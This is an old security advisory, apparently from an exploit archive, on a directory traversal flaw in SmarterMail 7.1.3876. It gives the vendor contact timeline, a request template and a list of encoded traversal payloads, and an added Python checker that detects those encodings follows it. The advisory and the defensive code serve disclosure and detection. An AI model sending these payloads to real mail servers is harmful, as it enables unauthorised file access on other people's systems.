
[remote exploits] - SmarterMail 7.1.3876 Directory Traversal

Posted on 19 September 2010

<pre>
======================================================
SmarterMail 7.1.3876 Directory Traversal Vulnerability
======================================================

# Vendor: smartertools.com SmarterMail 7.x (7.1.3876)
# Date: 2010-09-12
# Author : sqlhacker – http://cloudscan.me
# Thanks to : Burp Suite Pro - engagement tool
#           : FuzzDB
# Contact : h02332@gmail.com
# Home : http://cloudscan.me
# Dork : insite: SmarterMail Enterprise 7.1
# Bug : Directory Traversal, OS Command Injection, Other Critical Vulns
# Tested on : SmarterMail 7.x (7.1.3876) // Windows 2008 /64/R2
# Vendor Contact - August 14, 2010
# - Multiple email exchanges with Vendor thru Labor Day 2010
# - Vendor took no action 9/1/2010
# - Public Disclosure with Workaround Solution Provided 9-4-2010
########################################################################

Source URL
http://cloudscan.blogspot.com/2010/09/smarter-stats-533819-file-fuzzing.html

The default installation of SmarterMail is vulnerable to 1 (or more) of the
file fuzzing types contained within FuzzDB and Burp Suite Pro 1.3.08, which
were used as a baseline analysis for exploit surface modeling. Reduced to
exploits: Directory Traversal, OS Injection and Execution.

The initial exploit requires user-level privileges.

A malicious user seeking to exploit browser clients can launch attacks from
the User Home / Public Web Directory, utilizing the SSL certificate of the
host provider.

A malicious user seeking to exploit the host server can launch attacks as
Local File Inclusion or Remote File Inclusion and perform operating system
injections and execution.

A malicious user can read and write directories and files and perform
malicious operations due to the default configuration of SmarterMail.

This is reduced to:

GET {Vulnerable SmarterMail Site}/path/*payload*relative/path/to/target/file/

..%255c
.%5c../..%5c
/..%c0%9v../
/..%c0%af../
/..%255c..%255c
../../../../../../win.ini
../../../../../../SmarterMail/ExploitShells
../../../../../../SmarterMail/{Domain}/{(l)uzername)/PubPayloadDir/logo_25.jpg%../%../somewhere to read/write

# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-19]
</pre>
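
The payload list above consists of encoded forms of `..` followed by a path separator (double-encoded backslash, overlong UTF-8 slash), which a filter matching only the literal `../` does not see. The following check is an added example, not part of the original advisory or of SmarterMail: it percent-decodes a request path until the value stops changing, then flags repeated encoding, overlong UTF-8 bytes and `..` segments. The function names, the decode cap and the two benign sample paths are assumptions made for the example.

```python
from urllib.parse import unquote_to_bytes

MAX_ROUNDS = 5  # assumption: cap on repeated decoding for this example
OVERLONG_SLASH = b"\xc0\xaf"  # "%c0%af": overlong two-byte UTF-8 form of "/"


def canonicalize(raw_path):
    """Percent-decode until the value stops changing; return (bytes, rounds)."""
    current, rounds = raw_path.encode("utf-8"), 0
    while rounds < MAX_ROUNDS:
        decoded = unquote_to_bytes(current)
        if decoded == current:
            break
        current, rounds = decoded, rounds + 1
    return current, rounds


def inspect_path(raw_path):
    """Return the sorted findings for one request path (empty list = clean)."""
    decoded, rounds = canonicalize(raw_path)
    findings = set()
    if rounds > 1:  # e.g. "%255c" -> "%5c" -> "\"
        findings.add("multi-encoded")
    # Bytes 0xC0 and 0xC1 never occur in well-formed UTF-8.
    if b"\xc0" in decoded or b"\xc1" in decoded:
        findings.add("overlong-utf8")
    # Windows accepts "\" as a separator, so fold every form into "/".
    folded = decoded.replace(OVERLONG_SLASH, b"/").replace(b"\\", b"/")
    if b".." in folded.split(b"/"):
        findings.add("traversal")
    return sorted(findings)


# Constructed sample: encodings quoted from the advisory plus two benign paths.
SAMPLES = [
    "..%255c",
    ".%5c../..%5c",
    "/..%c0%9v../",
    "/..%c0%af../",
    "/..%255c..%255c",
    "../../../../../../win.ini",
    "/files/annual%20report.pdf",
    "/static/logo_25.jpg",
]

if __name__ == "__main__":
    for path in SAMPLES:
        print(f"{path:30} {inspect_path(path) or 'clean'}")
```

The same canonical form should be the one the application resolves against its web root, so that the check and the file access never disagree about what the path means.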

 
